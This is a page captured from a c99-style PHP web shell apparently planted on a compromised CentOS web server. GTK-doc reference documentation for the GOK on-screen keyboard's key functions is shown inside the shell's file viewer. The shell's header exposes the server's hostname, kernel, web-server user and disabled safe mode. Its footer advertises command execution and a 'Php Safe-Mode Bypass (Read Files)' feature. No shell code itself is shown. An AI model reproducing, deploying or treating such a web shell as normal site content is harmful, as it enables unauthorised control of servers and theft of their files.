Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/gtk-doc/html/gok/ drwxr-xr-x | |
| Viewing file: Select action/file-type:
Synopsisenum KeyStyles; #define FONT_SIZE_GROUP_UNDEFINED #define FONT_SIZE_GROUP_UNIQUE #define FONT_SIZE_GROUP_WORDCOMPLETE gboolean gok_key_initialize (GokKey *pKey, xmlNode *pNode); gboolean gok_key_add_label (GokKey *pKey, gchar *pLabelText, guint level, guint group, const gchar *vmods); void gok_key_set_output (GokKey *pKey, gint Type, gchar *pName, AccessibleKeySynthType Flag); void gok_key_change_label (GokKey *pKey, gchar *LabelText); void gok_key_update_label (GokKey *pKey); gint gok_key_get_label_lengthpercell (GokKey *pKey); gint gok_key_get_label_heightpercell (GokKey *pKey); gint gok_key_calculate_font_size (GokKey *pKey, gboolean width, gboolean bHeight); void gok_key_set_font_size (GokKey *pKey, gint Size); void gok_key_set_button_name (GokKey *pKey); void gok_key_set_button_label (GokKey *pKey, gchar *LabelText); gchar* gok_key_get_label (GokKey *pKey); GokKeyLabel* gok_keylabel_new (GokKey *pKey, gchar *pLabelText, guint level, guint group, const gchar *vmods); void gok_keylabel_delete (GokKeyLabel *pKeyLabel); void gok_key_set_cells (GokKey *pKey, gint top, gint bottom, gint left, gint right); GokKey* gok_key_duplicate (GokKey *pKey); Detailsenum KeyStylestypedef enum {
KEYSTYLE_NORMAL,
KEYSTYLE_BRANCH,
KEYSTYLE_BRANCHBACK,
KEYSTYLE_GENERALDYNAMIC,
KEYSTYLE_BRANCHMENUS,
KEYSTYLE_BRANCHMENUITEMS,
KEYSTYLE_MENUITEM,
KEYSTYLE_BRANCHTOOLBARS,
KEYSTYLE_TOOLBARITEM,
KEYSTYLE_BRANCHGUI,
KEYSTYLE_BRANCHGUIACTIONS,
KEYSTYLE_PAGESELECTION,
KEYSTYLE_BRANCHCOMPOSE,
KEYSTYLE_TEXTNAV,
KEYSTYLE_EDIT,
KEYSTYLE_SELECT,
KEYSTYLE_TOGGLESELECT,
KEYSTYLE_BRANCHALPHABET,
KEYSTYLE_SETTINGS,
KEYSTYLE_SPELL,
KEYSTYLE_WORDCOMPLETE,
KEYSTYLE_POINTERCONTROL,
KEYSTYLE_BRANCHHYPERTEXT,
KEYSTYLE_BRANCHMODAL,
KEYSTYLE_HTMLACTION,
KEYSTYLE_HYPERLINK,
KEYSTYLE_BRANCHTEXT,
KEYSTYLE_HELP,
KEYSTYLE_ABOUT,
KEYSTYLE_DOCK,
KEYSTYLE_MOUSE,
KEYSTYLE_MOUSEBUTTON,
KEYSTYLE_REPEATNEXT,
KEYSTYLE_ADDWORD,
KEYSTYLE_INSENSITIVE
} KeyStyles;
gok_key_initialize ()gboolean gok_key_initialize (GokKey *pKey,
xmlNode *pNode);
gok_key_add_label ()gboolean gok_key_add_label (GokKey *pKey,
gchar *pLabelText,
guint level,
guint group,
const gchar *vmods);
Adds a label to the key. This allocates memory for the label that will be freed in gok_key_delete.
gok_key_set_output ()void gok_key_set_output (GokKey *pKey,
gint Type,
gchar *pName,
AccessibleKeySynthType Flag);
Sets the output for the key. This allocates memory for the output that will be freed in gok_key_delete.
gok_key_change_label ()void gok_key_change_label (GokKey *pKey,
gchar *LabelText);
Changes the label displayed on the gok key.
gok_key_update_label ()void gok_key_update_label (GokKey *pKey); Changes the key's label if the modifier state has changed.
gok_key_get_label_lengthpercell ()gint gok_key_get_label_lengthpercell (GokKey *pKey); Calculates the length of the key's label. Some keys span more than one cell so divide the label length into the number of cells.
gok_key_get_label_heightpercell ()gint gok_key_get_label_heightpercell (GokKey *pKey); Calculates the height of the key's label. Some keys span more than one cell so divide the label height into the number of cells.
gok_key_calculate_font_size ()gint gok_key_calculate_font_size (GokKey *pKey,
gboolean width,
gboolean bHeight);
Calculates the font size needed for the key's label to fill the key.
gok_key_set_font_size ()void gok_key_set_font_size (GokKey *pKey,
gint Size);
Sets the font size for the key.
gok_key_set_button_name ()void gok_key_set_button_name (GokKey *pKey); Sets the 'name' of the key's label. The 'name' is used to determine the key/label colors from the .rc file. This must be called for every key after it's created and after the label name has been changed.
gok_key_set_button_label ()void gok_key_set_button_label (GokKey *pKey,
gchar *LabelText);
Changes the button label displayed on the key.
gok_key_get_label ()gchar* gok_key_get_label (GokKey *pKey);
gok_keylabel_new ()GokKeyLabel* gok_keylabel_new (GokKey *pKey,
gchar *pLabelText,
guint level,
guint group,
const gchar *vmods);
Allocates memory for a new key label and initializes the GokKeyLabel structure. Returns a pointer to the new key label, NULL if it can't be created. Add this label to a key so it will be deleted when the key is deleted.
gok_keylabel_delete ()void gok_keylabel_delete (GokKeyLabel *pKeyLabel);
gok_key_set_cells ()void gok_key_set_cells (GokKey *pKey,
gint top,
gint bottom,
gint left,
gint right);
Changes the cell coordinates (used by the editor).
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0139 ]-- |